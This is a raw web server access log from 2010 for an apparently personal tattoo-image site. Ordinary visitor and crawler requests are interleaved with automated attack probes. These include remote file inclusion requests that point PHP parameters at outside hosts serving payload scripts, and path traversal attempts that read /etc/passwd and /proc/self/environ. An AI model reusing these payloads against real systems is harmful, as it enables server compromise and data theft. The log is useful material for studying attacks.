62.140.247.10 - - [28/Apr/2010:02:34:33 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
207.46.204.190 - - [28/Apr/2010:02:34:55 -0500] "GET /logs/access_log.1189641600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
210.190.64.68 - - [28/Apr/2010:02:36:29 -0500] "GET /logs/access_log.1237334400//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
207.46.204.188 - - [28/Apr/2010:02:41:54 -0500] "GET /logs/access_log.1196380800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
188.72.243.72 - - [28/Apr/2010:02:43:49 -0500] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
188.72.243.72 - - [28/Apr/2010:02:43:49 -0500] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
188.72.243.72 - - [28/Apr/2010:02:43:49 -0500] "GET /logs/access_log.1268611200%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
188.72.243.72 - - [28/Apr/2010:02:44:07 -0500] "GET /logs/access_log.1270684800%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
188.72.243.72 - - [28/Apr/2010:02:44:10 -0500] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
188.72.243.72 - - [28/Apr/2010:02:44:10 -0500] "GET /logs/access_log.1266537600//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
188.72.243.72 - - [28/Apr/2010:02:44:10 -0500] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
74.86.210.130 - - [28/Apr/2010:02:45:21 -0500] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
74.86.210.130 - - [28/Apr/2010:02:45:21 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.195.112.180 - - [28/Apr/2010:02:45:35 -0500] "GET /logs/access_log.1208131200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
188.72.243.72 - - [28/Apr/2010:02:45:42 -0500] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
188.72.243.72 - - [28/Apr/2010:02:45:42 -0500] "GET /logs/access_log.1270684800//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
188.72.243.72 - - [28/Apr/2010:02:45:42 -0500] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
188.72.243.72 - - [28/Apr/2010:02:45:42 -0500] "GET /logs/access_log.1268611200//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
81.21.79.214 - - [28/Apr/2010:02:46:01 -0500] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
81.21.79.214 - - [28/Apr/2010:02:46:01 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
67.195.112.180 - - [28/Apr/2010:02:47:59 -0500] "GET /logs/access_log.1258761600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
184.73.37.93 - - [28/Apr/2010:02:49:11 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
184.73.37.93 - - [28/Apr/2010:02:49:12 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
184.73.37.93 - - [28/Apr/2010:02:49:34 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
184.73.37.93 - - [28/Apr/2010:02:49:34 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
200.93.147.154 - - [28/Apr/2010:02:50:01 -0500] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
200.93.147.154 - - [28/Apr/2010:02:50:01 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
69.175.26.98 - - [28/Apr/2010:02:50:04 -0500] "GET /logs/access_log.1220054400//login.php?dir=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
69.175.26.98 - - [28/Apr/2010:02:50:04 -0500] "GET //login.php?dir=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
69.175.26.98 - - [28/Apr/2010:02:50:05 -0500] "GET /logs//login.php?dir=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
188.72.243.72 - - [28/Apr/2010:02:50:33 -0500] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
188.72.243.72 - - [28/Apr/2010:02:50:33 -0500] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
188.72.243.72 - - [28/Apr/2010:02:50:33 -0500] "GET /logs/access_log.1268611200%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
188.72.243.72 - - [28/Apr/2010:02:50:50 -0500] "GET /logs/access_log.1270684800%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
208.115.111.248 - - [28/Apr/2010:02:51:11 -0500] "GET /logs/access_log.1217894400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [28/Apr/2010:02:51:14 -0500] "GET /logs/access_log.1222992000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [28/Apr/2010:02:51:16 -0500] "GET /logs/access_log.1250640000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [28/Apr/2010:02:51:19 -0500] "GET /logs/access_log.1262563200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
69.175.26.98 - - [28/Apr/2010:02:52:02 -0500] "GET /logs/access_log.1219363200%20%20//login.php?dir=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.175.26.98 - - [28/Apr/2010:02:52:02 -0500] "GET //login.php?dir=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
69.175.26.98 - - [28/Apr/2010:02:52:02 -0500] "GET /logs//login.php?dir=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
164.115.5.63 - - [28/Apr/2010:02:52:35 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.cevup.com/images/bogel/id1.txt???? HTTP/1.1" 404 361 "-""Mozilla/5.0"
164.115.5.63 - - [28/Apr/2010:02:52:35 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.cevup.com/images/bogel/id1.txt???? HTTP/1.1" 404 356 "-""Mozilla/5.0"
164.115.5.63 - - [28/Apr/2010:02:52:35 -0500] "GET /logs/access_log.1220054400//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.cevup.com/images/bogel/id1.txt???? HTTP/1.1" 404 383 "-""Mozilla/5.0"
207.46.195.225 - - [28/Apr/2010:02:53:25 -0500] "GET /logs/access_log.1195776000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
188.72.243.72 - - [28/Apr/2010:02:55:03 -0500] "GET /logs/access_log.1266537600//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
188.72.243.72 - - [28/Apr/2010:02:55:36 -0500] "GET /logs/access_log.1268611200//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
188.72.243.72 - - [28/Apr/2010:02:55:36 -0500] "GET /logs/access_log.1270684800//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
76.97.93.4 - - [28/Apr/2010:03:02:32 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/url?sa=t&source=web&ct=res&cd=6&ved=0CBMQFjAF&url=http%3A%2F%2Ftomdolan.pconline.com%2Ftattoo%2Ftattoo1.htm&rct=j&q=vintage+flash+tattoo+art+torrent&ei=d-vXS6CVCo2g8ASyzcCFBw&usg=AFQjCNHjrXnOYOTb8B7m3-3jlFkAbM0Ulw""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:02:32 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:02:35 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:02:35 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:02:35 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:02:35 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:02:35 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:02:35 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:02:35 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:02:35 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:02:35 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:02:35 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:02:35 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:02:35 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:02:48 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:02:48 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:02:48 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:02:48 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:02:48 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:02:48 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:02:48 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:02:48 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:02:48 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:02:48 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:02:48 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:03:06 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:03:06 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:03:06 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:03:06 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:03:06 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:03:06 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:03:06 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:03:06 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:03:06 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:03:06 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:03:06 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:03:11 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:03:11 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:03:11 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:03:11 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:03:11 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:03:11 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:03:11 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:03:11 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:03:11 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:03:11 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.97.93.4 - - [28/Apr/2010:03:03:11 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
65.60.41.26 - - [28/Apr/2010:03:03:44 -0500] "GET /logs/access_log.1219708800/index.php?option=/modules/TotalCalendar/about.php?inc_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
65.60.41.26 - - [28/Apr/2010:03:03:44 -0500] "GET /index.php?option=/modules/TotalCalendar/about.php?inc_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
65.60.41.26 - - [28/Apr/2010:03:03:44 -0500] "GET /logs/index.php?option=/modules/TotalCalendar/about.php?inc_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
188.72.243.72 - - [28/Apr/2010:03:04:12 -0500] "GET /logs/access_log.1220054400//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
188.72.243.72 - - [28/Apr/2010:03:04:12 -0500] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
188.72.243.72 - - [28/Apr/2010:03:04:12 -0500] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
188.72.243.72 - - [28/Apr/2010:03:04:28 -0500] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
188.72.243.72 - - [28/Apr/2010:03:04:28 -0500] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
188.72.243.72 - - [28/Apr/2010:03:04:28 -0500] "GET /logs/access_log.1220054400//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
114.108.151.149 - - [28/Apr/2010:03:09:38 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 318 "-""Mozilla/5.0"
114.108.151.149 - - [28/Apr/2010:03:09:38 -0500] "GET /logs/access_log.1220054400%20%20/modules/My_eGallery/index.php?basepath=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 342 "-""Mozilla/5.0"
